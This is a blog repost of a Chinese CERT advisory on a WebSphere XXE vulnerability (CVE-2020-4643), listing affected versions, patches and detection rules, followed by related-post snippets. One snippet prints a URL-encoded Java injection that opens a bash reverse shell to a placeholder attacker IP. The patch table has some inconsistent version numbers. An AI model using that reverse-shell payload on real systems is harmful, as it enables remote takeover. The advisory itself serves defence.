探针漏洞_【安全风险通告】WebSphere Application Server XXE漏洞安全风险通告

最新推荐文章于 2024-08-19 23:08:53 发布
最新推荐文章于 2024-08-19 23:08:53 发布
阅读量554 收藏
点赞数
文章标签: 探针漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39640090/article/details/112639067
版权
奇安信CERT发现WebSphere Application Server存在XXE漏洞,可能导致敏感信息泄露。建议用户升级到最新版本或应用官方发布的补丁进行防护。奇安信天眼等安全系统已更新检测规则,提供有效防护。
摘要由CSDN通过智能技术生成
9fc428c0762d7d3eb2b2fd28c82d7c08.gif

2020年9月22日,奇安信CERT监测到WebSphere Application Server被曝存在XXE漏洞,IBM WebSphere Application Server在处理XML数据时,容易受到XML外部实体注入(XXE)攻击,远程攻击者可以利用此漏洞来窃取敏感信息。鉴于漏洞危害较大,建议客户升级到最新版本。

9fc428c0762d7d3eb2b2fd28c82d7c08.gif 奇安信 CERT 漏洞描述

WebSphere Application Server 是一款由IBM 公司开发的高性能的Java 中间件服务器,可用于构建、运行、集成、保护和管理部署的动态云和Web 应用。它不仅能够确保高性能和灵活性,还提供多种开放标准编程模型选项,旨在最大程度提高开发人员的生产力。

2020年9月22日,奇安信CERT监测到WebSphere Application Server被曝存在XXE漏洞,IBM WebSphere Application Server在处理XML数据时,容易受到XML外部实体注入(XXE)攻击,远程攻击者可以利用此漏洞来窃取敏感信息。

奇安信CERT第一时间复现了该漏洞,复现截图如下:

3565aba0e5d8a312bcce3e608c01accb.png

7abe68837f76c5158c1012837a820255.png 风险等级

奇安信 CERT风险评级为:高危

风险等级:蓝色(一般事件)

影响范围

IBM WebSphere Application Server 7.0

IBM WebSphere Application Server 8.0

IBM WebSphere Application Server 8.5

IBM WebSphere Application Server 9.0

7abe68837f76c5158c1012837a820255.png 处置建议

目前官方已发布补丁修复了该漏洞,对于已停止维护的版本也提供了安全补丁,请受影响的用户尽快更新进行防护。

可手动进行版本更新与补丁安装(注:安装补丁之前请先关闭WebSphere服务,安装完成后再将服务开启)。

受影响版本

修复方法

补丁下载链接

9.0.0.0 - 9.0.5.5

安装补丁PH27509、

升级至9.0.5.6或更高版本

https://www.ibm.com/support/pages/node/6333617

8.5.0.0 - 8.5.5.17

安装补丁PH27509、升级至8.5.5.19或更高版本

8.0.0.0 - 8.0.0.15

安装补丁PH27509、

升级至8.0.0.15或更高版本

7.0.0.0 - 7.0.0.45

安装补丁PH27509、

升级至7.0.0.45或更高版本

7abe68837f76c5158c1012837a820255.png 产品线解决方案

奇安信天眼检测方案

奇安信天眼新一代安全感知系统已经能够有效检测针对该漏洞的攻击,请将规则版本升级到3.0.0922.12379或以上版本。规则ID及规则名称:

0x10020A6B,WebSphere Application Server XXE漏洞(CVE-2020-4643);

奇安信天眼流量探针规则升级方法:系统配置->设备升级->规则升级,选择“网络升级”或“本地升级”。

奇安信网站应用安全云防护系统已更新防护特征库

奇安信网神网站应用安全云防护系统已全局更新所有云端防护节点的防护规则,支持对WebSphere Application Server XXE漏洞的防护。

奇安信网神网络数据传感器系统产品检测方案

奇安信网神网络数据传感器(NDS3000/5000/9000系列)产品,已具备该漏洞的检测能力。规则ID为:5919,建议用户尽快升级检测规则库至2009221456以后版本并启用该检测规则。

奇安信网神统一服务器安全管理平台更新入侵防御规则库

奇安信网神虚拟化安全轻代理版本可通过更新入侵防御规则库2020.09.22版本,支持对WebSphere Application Server XXE漏洞漏洞的防护,当前规则正在测试中,将于9月22日发布,届时请用户联系技术支持人员获取规则升级包对轻代理版本进行升级。

奇安信网神统一服务器安全管理平台可通过更新入侵防御规则库10297版本,支持对WebSphere Application Server XXE漏洞漏洞的防护,当前规则正在测试中,将于9月22日发布,届时请用户联系技术支持人员获取规则升级包对融合版本进行升级。

7abe68837f76c5158c1012837a820255.png 参考资料 [1] https://www.ibm.com/support/pages/security-bulletin-websphere-application-server-vulnerable-information-exposure-vulnerability-cve-2020-4643 7abe68837f76c5158c1012837a820255.png 时间线 2020年9月22日,奇安信 CERT发布安全风险通告 奇安信 CERT

奇安信CERT致力于

第一时间为企业级客户提供

安全风险通告和有效的解决方案  

fbb5490591c07f52d8db5277d89f40ee.png
weixin_39640090
关注
CVE-2020-4643 —— IBM WebSphere Application Server XXE 漏洞
战神/calmness的博客
12-10 513
目录 IBM WebSphere Application Server组件介绍 描述 影响版本 过程 修复建议 CVE-2020-4643 | IBM WebSphere Application Server XXE 漏洞 IBM WebSphere Application Server组件介绍 IBM WebSphere Application Server 是一种高性能的 Java 应用服务器,可用于构建、运行、集成、保护和管理内部部署和/或外部部署的动态云和 Web 应用。它不仅能
rmi程代码执行漏洞_WebSphere 程代码执行漏洞CVE20204450
weixin_39820173的博客
01-05 783
漏洞名称:WebSphere 程代码执行漏洞CVE-2020-4450威胁等级:高危影响范围:WebSphere Application Server 9.0.0.0 - 9.0.5.4WebSphere Application Server 8.5.0.0 - 8.5.5.17漏洞类型:程代码执行利用难度:漏洞分析1 WebSphere 组件介绍WebSphere 是 IB...
常见DDoS攻击之Application Attacks
最新发布
Grand_whh的博客
08-19 831
应用程序攻击(Application Attacks)是指针对应用程序层面的网络攻击,目的是利用应用程序安全漏洞来获取未授权访问、数据泄露或其他恶意行为。
WebSphere Application Server6.x资源环境提供程序配置
09-01
J2EE应用一般采用properties或者Web.xml存储系统的一些配置信息,这些方法不可避免地需要修改文件,而采用WAS的资源环境提供程序可以在WAS控制台直接修改配置属性值,另外多个应用可以共享同一个配置属性。
WebSphere漏洞总结复现
1ance's blog
11-14 1万+
写在前面:本文为漏洞复现系列WebSphere篇,复现的漏洞已vulhub存在的环境为主。 欢迎大家点赞收藏,点点关注更好了hhhhhh 文章目录简介WebSphere反序列化(CVE-2015-7450)漏洞原理影响范围漏洞复现修复建议弱口令 && 后台Getshell漏洞原理影响范围漏洞复现修复建议CVE-2020-4450总结 简介 WebSphere® Application Server 加速交付新应用程序和服务,它可以通过快速交付创新的应用程序来帮助企业提供丰富的用户体验从基
OWASP top10(OWASP十大应用安全风险)之A4 XML外部实体(XXE
qq_39682037的博客
03-18 2431
TOP4 XML外部实体(XXE) XML外部实体攻击是对解析XML输入的应用程序的一种攻击。当弱配置的XML解析器处理包含对外部实体的引用的XML输入时,就会发生此攻击。 默认情况下,大多数XML解析器容易受到XXE攻击。因此,确保应用程序不具有此漏洞的责任主要在于开发人员。 XML外部实体攻击媒介 如果恶意行为者可以上载XML或在XML文档包含敌对内容的脆弱的XML处理器 易受攻击的代码 ...
WebSphere Application Server9.0.0.2.txt
11-22
WebSphere Application Server9.0.0.2 安装包百度云盘资源地址,非商业用途,仅供学习使用。
WebSphere Application Server V6.1: 安全新功能
03-04
IBM WebSphere Application Server V6.1 在安全领域进行了一些非常重要的更改。在这篇简短的文章,我们将简要说明各个重要的更改,并讨论各自的影响。除了列出各个功能外,我们还将列出与安全相关的问题、抱怨和...
WebSphere Application Server for Developers V8.5.5
12-10
WebSphere Application Server for Developers V8.5.5是供开发人员使用的免费版的was,需要的小伙伴可以本地安装一下 ,部署测试web项目,因为上传空间有限,这里就只上传windows64位的。
IBM WebSphere Application Server Linux
09-10
IBM WebSphere Application Server Linux】是IBM公司提供的一款企业级应用服务器软件,专门用于部署和管理Java应用程序和服务。它在Linux操作系统环境下运行,为开发者和企业提供了一个强大的平台,支持Java EE...
WebSphere Application Server Performance Tuning Toolkit
Angel_He的专栏
08-30 2214
WebSphere® Application Server Performance Tuning Toolkit 是一款基于 Eclipse 的智能工具,旨在帮助用户通过使用数据收集、数据分析和统计数据推断技术来调优 WebSphere Application Server 的性能。其目的是帮助用户查找瓶颈,并适当调优应用程序。
WebSphere Application Server XML外部实体注入漏洞通告
爱国小白帽
04-22 548
报告编号:B6-2021-042202 报告来源:360CERT 报告作者:360CERT 更新日期:2021-04-22 0x01 漏洞简述 2021年04月22日,360CERT监测发现WebSphere Application Server发布漏洞风险通告,共包含2个漏洞漏洞编号分别为CVE-2021-20453,CVE-2021-20454,漏洞等级:高危,漏洞评分:8.2。 IBM WebSphere Application Server是一种高性能的Java应用服务器,可用于构建、运行、.
SAP产品存在4个严重漏洞,其1个位于ABAP内核
smellycat000的专栏
06-30 890
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本周,德国举行网络安全会议,发布了位于 SAP 公司 NetWeaver Application Server ABAP 和ABAP 平台 (AS ABAP) 所有发布和版本,服务器端 RFC 实现通信接口的四个严重漏洞的详情和 PoC 代码。ABAP 内核至少受一个漏洞影响这些漏洞可使攻击者在受影响系统上程执行任意代码、访问敏感数据、横向...
奇安信天眼_探针/分析平台部署及联动
热门推荐
呦菜呦爱玩的博客
03-10 1万+
奇安信天眼主要包括威胁情报(软件)、分析平台(硬件)、传感器(硬件)和文件威胁鉴定器(硬件)四个模块组成。一般仅需分析平台,流量传感器(探针)这2台设备配合使用。天眼分析平台用于存储传感器提交的流量日志、告警日志以及文件威胁鉴定器提交的告警日志。天眼传感器主要负责对网络流量的镜像流量进行采集并还原,还原后的流量日志会加密传输给天眼分析平台。
CVE-2020-7143漏洞复现
一个安全研究员
12-27 2244
复现一波
Exchange Server反序列化漏洞复现(CVE-2020-0688)
谢公子的博客
07-10 2583
漏洞描述: 漏洞产生的主要原因就是在Exchange ECP组件发现,邮件服务在安装的过程不会随机生成秘钥,也就是说所有默认安装的Exchange服务器的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥对服务器发起攻击,在服务器以SYSTEM权限程执行代码。 漏洞影响版本: Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 Microsoft Exchange Serve
金蝶Apusic 应用服务器9.0版本上,springboot项目关于文件上传的一个问题
竖子不足与谋的博客
07-27 2151
项目部署在金蝶v9上使用文件上传时,请求接口获取不到参数。但是在本地启动应用是可以获取到参数,没有任何问题。 @RequestMapping("doUpload") public void doUpload(DocAttaPage page,@RequestParam(value = "file") MultipartFile file, Integer chunk,Integer chunks,HttpServletResponse response){ } 排查问
漏洞通告WebSphere Application Server权限提升漏洞(CVE-2020-4362)通告
爱国小白帽
04-14 1984
漏洞通告WebSphere Application Server权限提升漏洞(CVE-2020-4362)通告 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天 通告编号:NS-2020-0025 2020-04-14 TA****G: WebSphere、权限提升、CVE-2020-4362 漏****洞危害: 攻击者利用此漏洞,可实现...
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1379
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值